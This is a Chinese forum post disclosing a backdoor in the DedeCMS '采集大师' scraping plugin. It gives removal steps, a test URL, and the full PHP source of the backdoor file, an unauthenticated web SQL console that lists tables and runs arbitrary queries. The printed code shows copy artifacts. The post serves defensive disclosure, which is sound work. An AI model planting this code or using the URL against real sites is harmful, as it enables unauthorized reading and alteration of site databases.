DEDE采集大师官方留后门的删除办法
<p><span style='font-family: tahoma, arial, "Microsoft YaHei"; font-size: 14px;'>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: </span><br style='font-family: tahoma, arial, "Microsoft YaHei"; font-size: 14px;'><span style='font-family: tahoma, arial, "Microsoft YaHei"; font-size: 14px;'>http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo </span><br style='font-family: tahoma, arial, "Microsoft YaHei"; font-size: 14px;'><span style='font-family: tahoma, arial, "Microsoft YaHei"; font-size: 14px;'>输入以上网址,即可打开后门界面。 </span><br style='font-family: tahoma, arial, "Microsoft YaHei"; font-size: 14px;'><span style='font-family: tahoma, arial, "Microsoft YaHei"; font-size: 14px;'>说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: </span></p>
<p class="codetitle" style='margin: 3px auto 0px; padding: 0px 3px; outline: none; line-height: 25.2px; font-size: 14px; background: rgb(242, 246, 251); width: 640px; clear: both; border-top: 1px solid rgb(0, 153, 204); border-right: 1px solid rgb(0, 153, 204); border-left: 1px solid rgb(0, 153, 204); border-image: initial; border-bottom: none; font-family: tahoma, arial, "Microsoft YaHei";'>
<span><u>复制代码</u></span>代码如下:</p>
<p class="codebody" style='margin: 0px auto 3px; padding: 0px 3px 0px 5px; outline: none; line-height: 25.2px; font-size: 14px; background: rgb(221, 237, 251); border: 1px solid rgb(0, 153, 204); width: 638px; clear: both; font-family: tahoma, arial, "Microsoft YaHei";'>
<br>
<?php <br>
require_once(dirname(__FILE__)."/../include/common.inc.php"); <br>
if(emptyempty($dopost)) <br>
{ <br>
$dopost = ""; <br>
} <br>
if($dopost=="rename") <br>
{ <br>
if(rename('dedesql.query.php','arc.sqlquery.class.php')){ <br>
echo "成功!"; <br>
}else{ <br>
echo "失败!"; <br>
} <br>
exit(); <br>
} <br>
if($dopost=="viewinfo") <br>
{ <br>
if(emptyempty($tablename)) <br>
{ <br>
echo "没有指定表名!"; <br>
} <br>
else <br>
{ <br>
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); <br>
$dsql->Execute('me'); <br>
$row2 = $dsql->GetArray('me',MYSQL_BOTH); <br>
$ctinfo = $row2; <br>
echo "<xmp>".trim($ctinfo)."</xmp>"; <br>
} <br>
exit(); <br>
} <br>
if($dopost=="index") <br>
{ <br>
require_once(DEDEINC.'/arc.partview.class.php'); <br>
$envs = $_sys_globals = array(); <br>
$envs['aid'] = 0; <br>
$pv = new PartView(); <br>
$row = $pv->dsql->GetOne('Select * From `aspkus_homepageset`'); <br>
$templet = str_replace("{style}",$cfg_df_style,$row['templet']); <br>
$homeFile = dirname(__FILE__).'/'.$row['position']; <br>
$homeFile = str_replace("//","/",str_replace("\\","/",$homeFile)); <br>
$fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); <br>
fclose($fp); <br>
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; <br>
$pv->SetTemplet($tpl); <br>
$pv->SaveToHtml($homeFile); <br>
$pv->Close(); <br>
echo "成功更新首页!"; <br>
exit(); <br>
} <br>
else if($dopost=="query") <br>
{ <br>
$sqlquery = trim(stripslashes($sqlquery)); <br>
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) <br>
{ <br>
echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; <br>
exit(); <br>
} <br>
if(eregi("^select ",$sqlquery)) <br>
{ <br>
$dsql->SetQuery($sqlquery); <br>
$dsql->Execute(); <br>
if($dsql->GetTotalRow()<=0) <br>
{ <br>
echo "运行SQL:{$sqlquery},无返回记录!"; <br>
} <br>
else <br>
{ <br>
echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; <br>
} <br>
$j = 0; <br>
while($row = $dsql->GetArray()) <br>
{ <br>
$j++; <br>
if($j>100) <br>
{ <br>
break; <br>
} <br>
echo "<hr size=1 width='100%'/>"; <br>
echo "记录:$j"; <br>
echo "<hr size=1 width='100%'/>"; <br>
foreach($row as $k=>$v) <br>
{ <br>
echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; <br>
} <br>
} <br>
exit(); <br>
} <br>
if($querytype==2) <br>
{ <br>
$sqlquery = str_replace("\r","",$sqlquery); <br>
$sqls = split(";[ \t]{0,}\n",$sqlquery); <br>
$nerrCode = "";$i=0; <br>
foreach($sqls as $q) <br>
{ <br>
$q = trim($q); <br>
if($q=="") <br>
{ <br>
continue; <br>
} <br>
$dsql->ExecuteNoneQuery($q); <br>
$errCode = trim($dsql->GetError()); <br>
if($errCode=="") <br>
{ <br>
$i++; <br>
} <br>
else <br>
{ <br>
$nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; <br>
} <br>
} <br>
echo "成功执行{$i}个SQL语句!<br><br>"; <br>
echo $nerrCode; <br>
} <br>
else <br>
{ <br>
$dsql->ExecuteNoneQuery($sqlquery); <br>
$nerrCode = trim($dsql->GetError()); <br>
echo "成功执行1个SQL语句!<br><br>"; <br>
echo $nerrCode; <br>
} <br>
exit(); <br>
} <br>
if($dopost=="view") <br>
{ <br>
;echo '<html> <br>
<head> <br>
<meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <br>
<title>SQL命令行工具</title> <br>
<link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> <br>
</head> <br>
<body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <br>
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <br>
<tr> <br>
<td height="19" background="img/tbg.gif"> <br>
<table width="96%" border="0" cellspacing="1" cellpadding="1"> <br>
<tr> <br>
<td width="24%"><strong>SQL命令运行器:</strong></td> <br>
<td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> <br>
| <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> <br>
</td> <br>
</tr> <br>
</table> <br>
</td> <br>
</tr> <br>
<tr> <br>
<td height="200" bgcolor="#FFFFFF" valign="top"> <br>
<table width="100%" border="0" cellspacing="4" cellpadding="2"> <br>
<form action="" method="post" name="infoform" target="stafrm"> <br>
<input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <br>
<tr bgcolor="#F3FBEC"> <br>
<td width="15%" height="24" align="center">系统的表信息:</td> <br>
<td> <br>
<table width="100%" border="0" cellspacing="0" cellpadding="0"> <br>
<tr> <br>
<td width="35%"> <br>
<select name="tablename" id="tablename" size="6"> <br>
'; <br>
$dsql->SetQuery("Show Tables"); <br>
$dsql->Execute('t'); <br>
while($row = $dsql->GetArray('t',MYSQL_BOTH)) <br>
{ <br>
$dsql->SetQuery("Select count(*) From ".$row); <br>
$dsql->Execute('n'); <br>
$row2 = $dsql->GetArray('n',MYSQL_BOTH); <br>
$dd = $row2; <br>
echo " <option value='".$row."'>".$row."(".$dd.")</option>\r\n"; <br>
} <br>
;echo ' </select> <br>
</td> <br>
<td width="2%"> </td> <br>
<td width="63%" valign="bottom"> <br>
<div> <br>
<input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br>
<br /> <br>
<input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" /> <br>
<br /> <br>
<input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" /> <br>
</div> <br>
<div> <br>
<input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br>
<br /> <br>
<input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" /> <br>
</div> <br>
</td> <br>
</tr> <br>
</table></td> <br>
</tr> <br>
<tr> <br>
<td height="200" align="center">返回信息:</td> <br>
<td> <br>
<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> <br>
</td> <br>
</tr> <br>
</form> <br>
<form action="" method="post" name="form1" target="stafrm"> <br>
<input type=\'hidden\' name=\'dopost\' value=\'query\'> <br>
<tr> <br>
<td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <br>
<input name="querytype" type="radio" class="np" value="0"> <br>
单行命令(支持简单查询) <br>
<input name="querytype" type="radio" class="np" value="2" checked> <br>
多行命令</strong></td> <br>
</tr> <br>
<tr> <br>
<td height="118" colspan="2"> <br>
<textarea name="sqlquery" cols="60" rows="10" id="sqlquery"></textarea> <br>
</td> <br>
</tr> <br>
<tr> <br>
<td height="53" align="center"> </td> <br>
<td> <br>
<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> <br>
</td> <br>
</tr> <br>
</form> <br>
</table> <br>
</td> <br>
</tr> <br>
</table> <br>
</body> <br>
</html> <br>
';} <br>
?> </p>
頁:
[1]